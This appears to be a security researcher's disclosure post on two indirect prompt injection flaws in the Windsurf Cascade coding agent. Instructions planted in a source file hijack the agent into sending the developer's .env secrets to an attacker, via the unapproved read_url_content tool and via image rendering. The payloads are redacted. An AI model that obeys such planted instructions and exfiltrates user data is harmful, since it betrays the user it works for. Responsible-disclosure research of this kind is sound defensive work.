This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code and the coding agent is called Windsurf Cascade.
The attack vectors we will explore today allow an adversary during an indirect prompt injection to exfiltrate data from the developer’s machine.
These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern.
Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receeipt was acknowledged a few days after. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and departure of CEO and core team members certainly put Windsurf in the news.
Let’s explore this in detail.
When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that might be able to be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.
Here is a snipet of the system prompt:
You can find the Windsurf Cascade system prompt here.
One thing that stood out to me right away was the read_url_content
tool.
As the name read_url_content
suggests, this tool allows Windsurf to connect to a website and read data from it. However, a reading capability can also serve as a data exfiltration channel as part of the outbound HTTP request. And this tool does not require user approval, so it can be successfully invoked by an adversary during a prompt injection attack.
As a result, an attacker can exploit this during an indirect prompt injection attack - without requiring user confirmation.
The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!
Now, when the developer analyzes the file with Windsurf Cascade it will attack and exploit the AI agent and exfiltrate the contents of the .env
file using the read_url_content
tool.
The above screenshot shows how by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.
This video shows how such an exploit chain looks end-to-end:
This is the text in the beginning of the source code file:
<redacted for now, as this is not fixed>
With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval
The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read up details here.
Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.
As we have shown with many similar attacks over the last 2+ years this does not require a human in the loop and leads to data leakage when an application renders images from untrusted domains.
To keep things short in this post, the following screenshot shows the end to end exploit chain in a single screenshot:
This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.
This is the text in the beginning of the source code file:
<redacted for now, as this is not fixed>
That’s all that was needed to hijack Windsurf Cascade.
These vulnerabilities were disclosed to Windsurf on May 30, 2025 and receipt acknowledged by Windsurf a few days later. However, all further inquiries around triage, bug status or fixes remain unanswered.
Hence, disclosing this publicly after ~3 months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.
read_url_content
tool with untrusted serversWindsurf Cascade is vulnerable to prompt injection and since there is no deterministic solution to fix prompt injection itself, security has to be enforced downstream of LLM output.
As demonstrated, weaknesses in tool invocation and image rendering allow a third-party attacker to embed malicious instructions into source code, websites, or even through RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy,” potentially leading to data exfiltration.